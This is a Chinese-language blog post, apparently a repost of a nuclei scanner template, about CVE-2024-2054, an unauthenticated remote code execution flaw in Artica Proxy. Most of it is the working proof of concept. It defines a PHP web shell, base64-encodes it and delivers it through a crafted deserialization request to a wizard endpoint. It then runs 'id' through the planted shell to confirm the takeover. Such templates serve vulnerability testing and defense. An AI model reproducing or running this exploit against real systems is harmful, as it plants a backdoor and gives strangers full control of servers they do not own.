Artica Proxy - Remote Code Execution

漏洞信息

漏洞名称: Artica Proxy - Remote Code Execution

漏洞编号:

  • CVE: CVE-2024-2054

漏洞类型: 命令执行

漏洞等级: 严重

漏洞描述: Artica Proxy是一款广泛使用的代理服务器软件,主要用于企业级网络环境中,提供网络流量管理和安全防护功能。该软件因其高效的性能和易用性,在多个行业中得到广泛应用。此次发现的远程代码执行漏洞(CVE-2024-2054)允许攻击者通过利用特定的端点,在服务器上执行任意命令,可能导致系统完全被控制。漏洞的技术根源在于软件未能正确处理用户输入,导致攻击者可以构造恶意请求,绕过安全限制,执行未授权的代码。这种漏洞的存在,使得攻击者无需任何形式的认证即可远程利用,极大地增加了安全风险。成功利用此漏洞的攻击者可以完全控制受影响的系统,进行数据窃取、服务中断等恶意操作,对企业和组织的网络安全构成严重威胁。因此,建议所有使用Artica Proxy的用户立即更新到最新版本,以修复此漏洞。

产品厂商: articatech

产品名称: artica_proxy

影响版本: 4.50

来源: https://github.com/projectdiscovery/nuclei-templates/blob/b5def12c15968859278c86990b15e11cad2ada7c/http%2Fcves%2F2024%2FCVE-2024-2054.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68

id: CVE-2024-2054

info:
  name: Artica Proxy - Remote Code Execution
  author: pussycat0x
  severity: critical
  description: |
    This template targets a remote code execution vulnerability in Artica Proxy by exploiting a specific endpoint.
  impact: |
    Successful exploitation allows attackers to execute arbitrary commands on the server, potentially leading to full system compromise.
  remediation: |
    Update Artica Proxy to the latest version that addresses this vulnerability and implement proper input validation.
  reference:
    - https://github.com/0xMarcio/cve/blob/main/2024/CVE-2024-2054.md
    - https://github.com/Madan301/CVE-2024-2054/blob/main/CVE-2024-2054.py
    - https://github.com/tanjiti/sec_profile
    - https://github.com/Madan301/CVE-2024-2054
    - https://github.com/nomi-sec/PoC-in-GitHub
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-2054
    cwe-id: CWE-502
    epss-score: 0.79565
    epss-percentile: 0.99025
    cpe: cpe:2.3:a:articatech:artica_proxy:4.50:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: articatech
    product: artica_proxy
  tags: cve,cve2024,rce,artica,intrusive

variables:
  websh: '<?php system($_GET["cmd"]);?>'
  payload: '{{base64(websh)}}'


http:
  - raw:
      - |
        GET /wizard/wiz.upload.php HTTP/1.1
        Host: {{Hostname}}

      - |
        GET /wizard/wiz.wizard.progress.php?build-js=%7B'TzoxOToiTmV0X0ROUzJfQ2FjaGVfRmlsZSI':%20%7B'cache_file':%20'/usr/share/artica-postfix/wizard/meow.upload.php',%20'cache_serializer':%20'json',%20'cache_size':%20999999999,%20'cache_data':%20%7B'{{payload}}+':%20%7B'cache_date':%200,%20'ttl':%20999999999%7D%7D%7D%7D  HTTP/1.1
        Host: {{Hostname}}
        User-Agent: python-requests/2.32.3

      - | 
        GET /wizard/wiz.upload.php?cmd=id HTTP/1.1
        Host: {{Hostname}}


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "wiz.wizard.progress.php"

      - type: regex
        part: body
        regex:
          - "uid=[0-9]+.*gid=[0-9]+.*"


Github Poc
#projectdiscovery/nuclei-templates:github issues #命令执行
Artica Proxy - Remote Code Execution
http://example.com/2025/07/31/github_442287394/
作者
lianccc
发布于
2025年7月31日
许可协议